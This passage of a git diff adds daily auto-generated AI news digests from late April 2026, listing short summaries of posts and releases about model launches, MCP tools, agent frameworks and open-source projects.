We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix. Kudos to @flynn-eye for the help with this one! ## Fantasy fix @carsonfarmer made [ + +--- + +## [Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need](https://x.com/karpathy) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: mcp + +> Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools. + +--- + +## [AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed](https://x.com/ayirpelle/status/2029840518272975205) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: agent_tool + +> A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization. + +--- + +## [GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago](https://x.com/mercor_ai/status/2047859197593911522) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: api_update + +> GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years. + +--- + +## [ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again](https://x.com/GrishinRobotics/status/2047760472204546230) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: open_source + +> ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale. 
+ +--- + +## [Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War](https://x.com/SakanaAILabs/status/2047849392808624332) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: product_launch + +> Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war. + +--- + +## [@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap](https://x.com/Scobleizer/status/2047736381162901665) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: tool_update + +> Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility. + +--- + +## [@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw](https://x.com/NousResearch/status/2047840294406627659) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: product_launch + +> Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor. + +--- + +## [@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs PDF, Submits to Schwab](https://x.com/jxnlco/status/2047874586310766864) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: agent_tool + +> Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms. 
+ +--- + diff --git a/data/digest-2026-04-26.md b/data/digest-2026-04-26.md new file mode 100644 index 0000000..d9786e3 --- /dev/null +++ b/data/digest-2026-04-26.md @@ -0,0 +1,127 @@ +# Stack Scout - AI News Digest +**2026-04-26** | 15 stories | Auto-generated from 311 archived stories + +--- + +## [I built a free package manager for Claude Code MCP servers (open source)](https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source, developer_tool, cli_tool + +> **What I built** Every time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \`\~/.claude.json\`, restart. So I built **cgcone** to make it one command. `npm install -g @cgcone``/cli` `cgcone install context7` `cgcone install brave-search` That's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. **How Claude Code + +--- + +## [GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex](https://x.com/OpenAIDevs/status/2047377292981383662) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: api_update, tool_update, agent_tool + +> GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks. + +--- + +## [I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback](https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> I built **Impact Graph MCP** using Claude Code. 
It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”* **What it does:** You give it a function name, file path, or module, and it returns: * Direct and indirect dependents * Risk score (0–100) and risk factors * Which system layers are affected (API, auth, frontend, etc.) * Decision-oriented guidance: recommended strategy, suggested t + +--- + +## [DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race](https://x.com/ArtificialAnlys/status/2047547434809880611) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race. + +--- + +## [Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…](https://x.com/AmaniBisimwa4/status/2048370790333046822) +*X / @amanibisimwa4* | 26/04/2026 | Score: 1.00 +Tags: mcp, agent_tool + +> Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. Thanks to everyone who joined + +--- + +## [Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.](https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.86 +Tags: mcp, open_source + +> I've been using claude code daily and kept hitting the same wall, it would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. 
single. session. I measured it one day , 27,292 tokens before it wrote a single line of code, so I built **Fullerenes** `npx fullerenes init` maps your codebase into a local sqlite graph. agents query it over MCP instead of reading raw files from scratch. 27,292 → 919 tokens. same understanding. It has several oth + +--- + +## [GPT-5.5 is now available in the API. + +The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.](https://x.com/OpenAIDevs/status/2047742566410736090) +*X / @openaidevs* | 24/04/2026 | Score: 0.86 +Tags: api_update, product_launch + +> GPT-5.5 is now available in the API. The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries. + +--- + +## [huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models](https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/) +*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> This looks interesting. This is a quick summary according to Gemini: "Think of ML Intern as a "junior machine learning engineer" that lives inside your computer. While a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an "agent," meaning it doesn't just talk; it takes action. What it actually does for you: Reads the "Homework": If you tell it to use a new technique from a scientific paper, it will + +--- + +## [Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care](https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.78 +Tags: api_update, mcp + +> Cloudflare wrapped Agents Week last week. 
The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch. What I can't + +--- + +## [Most image managers suck for AI. I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!](https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/) +*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.70 +Tags: open_source, tool_update + +> **GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault) Be sure to check out all of the other details and images on the GitHub page. Hey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**. A few things it does: * **One-Click Import:** Use the include + +--- + +## [OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now](https://x.com/LoicBerthelot/status/2047690512199540959) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: developer_tool + +> The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. Mercury is trying to combine both. 
+ +--- + +## [AI agent burnout is real — what it means for careers in an AI-augmented workplace](https://x.com/Chengdavid923/status/2048451643298218069) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: agent_tool + +> The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like. + +--- + +## [GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…](https://x.com/genxproapp/status/2048454195716497743) +*X / @genxproapp* | 26/04/2026 | Score: 1.00 +Tags: mcp + +> GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https://genx.pro/latest One app. + +--- + +## [Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:](https://x.com/FSEvolved/status/2048447077705830600) +*X / @fsevolved* | 26/04/2026 | Score: 1.00 +Tags: api_update + +> Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up: + +--- + +## [United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. 
The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…](https://x.com/H_Mhatre_/status/2048359364902170792) +*X / @h_mhatre_* | 26/04/2026 | Score: 1.00 +Tags: open_source + +> United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks. + +--- + diff --git a/data/digest-2026-04-27.md b/data/digest-2026-04-27.md new file mode 100644 index 0000000..d04527e --- /dev/null +++ b/data/digest-2026-04-27.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-27** | 15 stories | Auto-generated from 683 archived stories + +--- + +## [(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes](https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 +Tags: product_launch, open_source, github_release, tool_update + +> **GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault) **Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1) I resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee + +--- + +## [Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. 
Alibaba's bigges…](https://x.com/bridgemindai/status/2048816878454194460) +*X / @bridgemindai* | 27/04/2026 | Score: 1.00 +Tags: api_update, open_source, agent_tool + +> Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less + +--- + +## [A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…](https://x.com/0xAirr/status/2048663698806620544) +*X / @0xairr* | 27/04/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP + +--- + +## [how to build a persistent memory layer like recall?](https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/) +*Reddit r/ClaudeAI* | 27/04/2026 | Score: 1.00 +Tags: api_update, mcp + +> I've been testing recall 2.0 and their context layer is exactly what i want. it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse + +--- + +## [it’s been a good run... 
rip my stable diffusion setup (+ Raven fanart)](https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 +Tags: api_update, tool_update + +> i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services. on top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build. anyway, i wa + +--- + +## [Built an MCP connector for official Python docs .. no API keys, no unofficial sources](https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/) +*Reddit r/ClaudeAI* | 27/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment. [https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server) The core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs. I built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and + +--- + +## [OpenClaw v2026.4.25 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.25) +*GitHub Releases · OpenClaw* | 27/04/2026 | Score: 0.78 +Tags: developer_tool, cli_tool + +> ## 2026.4.25 ### Highlights - Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. 
Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth. - Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov + +--- + +## [Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders](https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time. Stack: SDXL for backgrounds, optional AnimateDiff (fair warning: \~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. UI runs in Gradio locally. AnimateDiff integration was the most painful p + +--- + +## [PixlStash 1.1.0 is now available!](https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.70 +Tags: product_launch, open_source + +> [PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections. The main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well: * Automatic import folders in the UI along with the reference folders * Statistics sidebar that shows + +--- + +## [Is anyone working on a ComfyUI node for the new Ideogram LoRA API? 
(They call it Custom Model)](https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.62 +Tags: api_update, developer_tool + +> I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀 But, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? I'd love to be + +--- + +## [NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever](https://x.com/JoseCSancho/status/2048587841882439784) +*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today. + +--- + +## [NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap](https://x.com/AIKumarvels/status/2048294442063970777) +*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute. + +--- + +## [OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. 
The model is built for agentic tasks and ease of use: GPT-5.5 fig…](https://x.com/News_pulse360/status/2048733780744278450) +*X / @news_pulse360* | 27/04/2026 | Score: 1.00 +Tags: product_launch + +> OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do + +--- + +## [OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…](https://x.com/AlternativeTo/status/2048666474181808532) +*X / @alternativeto* | 27/04/2026 | Score: 1.00 +Tags: product_launch + +> OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https://alternativeto.net/news/2026/4/openai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ … + +--- + +## [two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…](https://x.com/witcheer/status/2048665173326532861) +*X / @witcheer* | 27/04/2026 | Score: 1.00 +Tags: product_launch + +> two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. 
V4-Pro at $1.74/$3.48, + +--- + diff --git a/data/digest-2026-04-28.md b/data/digest-2026-04-28.md new file mode 100644 index 0000000..e1c579c --- /dev/null +++ b/data/digest-2026-04-28.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-28** | 15 stories | Auto-generated from 683 archived stories + +--- + +## [Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors](https://x.com/NousResearch/status/2047518675163636112) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source, developer_tool, tool_update, agent_tool + +> Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. The release is the largest update to the framework to date. + +--- + +## [Qwen Code sdk-typescript-v0.1.7 released](https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7) +*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.94 +Tags: api_update, github_release, developer_tool, cli_tool + +> ## Bundled CLI Version This SDK release bundles CLI version: 0.15.3 Source: latest stable CLI from npm --- ## Bundled CLI Version This SDK release bundles CLI version: 0.13.1 Source: latest stable CLI from npm --- > Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation). ## What's Changed * chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632 * chore(release): sdk-typescript v0.1.4 by @qwen-c + +--- + +## [Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…](https://x.com/CrowdStrike/status/2049179351837512138) +*X / @crowdstrike* | 28/04/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> Is your security team struggling to monitor AI agent activity in SaaS environments? 
We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. Track administrative changes, tool + +--- + +## [Gemini Launches Agentic Trading on a Regulated US Exchange](https://x.com/xHub_AI/status/2049131460460745232) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world. + +--- + +## [NVIDIA Ships One Model That Replaces Vision Speech and Text Chain](https://x.com/benitoz/status/2049168050495053924) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights. + +--- + +## [Warp Terminal Goes Open Source](https://x.com/zeddotdev/status/2049167033275728343) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure. + +--- + +## [NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI](https://x.com/ainews_24_7/status/2049178579510956193) +*X / @ainews_24_7* | 28/04/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> NEWS: AWS and OpenAI officially announce their partnership. 
Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI + +--- + +## [NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.](https://x.com/earlyn_ai/status/2049176023724359681) +*X / @earlyn_ai* | 28/04/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers. + +--- + +## [shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.](https://x.com/DevLsx/status/2049019913465979131) +*X / @devlsx* | 28/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below. + +--- + +## [I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code](https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/) +*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.86 +Tags: api_update, developer_tool + +> I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos. So I built ginnie-agents and ran my own team on it for months. Open-sourcing it now. 
What it is: a framework for a team of autonomous AI agents in your Slack workspace. Each agent has: \- Its own Slack identity, app, avatar, channel \- Persistent thre + +--- + +## [Qwen Code v0.15.4 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4) +*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.78 +Tags: api_update, cli_tool + +> ## What's Changed * feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643 * fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609 * fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640 * fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q + +--- + +## [Open source package with 1 million monthly downloads stole user credentials](https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/) +*Ars Technica AI* | Score: 0.74 +Tags: open_source, developer_tool + +--- + +## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/) +*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. 
The CLI and MCP server ex + +--- + +## [ComfyUI Raises $30M at $500M Valuation](https://x.com/robertnishihara/status/2047772168147374085) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities. + +--- + +## [Scoble on One AI Doing Everything: The Everything App Is Coming](https://x.com/Scobleizer/status/2048690528653660399) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: tool_update + +> Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. The vision is more radical than most industry commentary about AI integration. + +--- + diff --git a/data/digest-2026-04-29.md b/data/digest-2026-04-29.md new file mode 100644 index 0000000..8b3a4f9 --- /dev/null +++ b/data/digest-2026-04-29.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-29** | 15 stories | Auto-generated from 700 archived stories + +--- + +## [Vercel CLI @vercel/python-workers@0.0.19 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19) +*GitHub Releases · Vercel CLI* | 29/04/2026 | Score: 0.62 +Tags: api_update, developer_tool, cli_tool + +> ### Patch Changes - b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends. - fddd88c: [vercel-workers] payload type validation - fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior. 
+ +--- + +## [Converting Claude Code into the most intelligent Deep Research Agent](https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there. HyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro. It uses a 16-step pipeline that creates a searchable, persistent knowled + +--- + +## [Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw](https://x.com/Maginative/status/2049200033665569020) +*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 +Tags: mcp, tool_update + +> Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session. + +--- + +## [AAIF Announces AGNTCon and MCPCon EU and NA for 2026](https://x.com/AgenticAIFdn/status/2039696612633571565) +*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 +Tags: mcp, product_launch + +> The Agentic AI Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders. + +--- + +## [Poolside AI Just Released Its First Public Models: Open Source and API](https://x.com/marah_i_abdin/status/2049161468017287490) +*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model. 
